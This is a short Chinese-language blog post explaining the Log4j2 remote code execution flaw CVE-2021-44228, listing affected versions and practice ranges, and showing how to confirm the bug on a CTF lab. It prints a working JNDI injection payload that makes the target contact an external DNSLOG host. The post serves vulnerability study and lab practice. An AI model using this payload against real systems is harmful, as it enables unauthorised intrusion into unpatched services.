Apache log4j2-RCE (CVE-2021-44228)
Apache Log4j2是一款Java日志框架,大量应用于业务系统开发。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞(CVE-2021-44228)。
0x01 漏洞简介
Apache Log4j2是一个基于Java的日志记录工具。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。
漏洞适用版本为2.0 <= Apache log4j2 <= 2.14.1
,只需检测Java应用是否引入 log4j-api , log4j-core 两个jar。若存在应用使用,极大可能会受到影响。
0x02 环境准备
验证靶场:
CTFSHOW(https://ctf.show/challenges)
VULFOCUS(http://vulfocus.io/)
掌控安全封神台(https://hack.zkaq.cn/battle)
0x03 漏洞验证(DNSLOG篇)
我们通过JNDI注入请求DNSLOG的恶意语句,如果在DNSLOG端能查看到访问记录,则证明远程代码执行漏洞存在
我们使用CTFshow的靶场来做后续验证
我们直接在登录框输入恶意代码:
${jndi:ldap://sc7190.dnslog.cn/exp}
然后我们成功在DNSLOG端查看到访问记录,证实这里漏洞存在
本文来自博客园,作者:NoCirc1e,转载请注明原文链接:https://www.cnblogs.com/NoCirc1e/p/16283289.html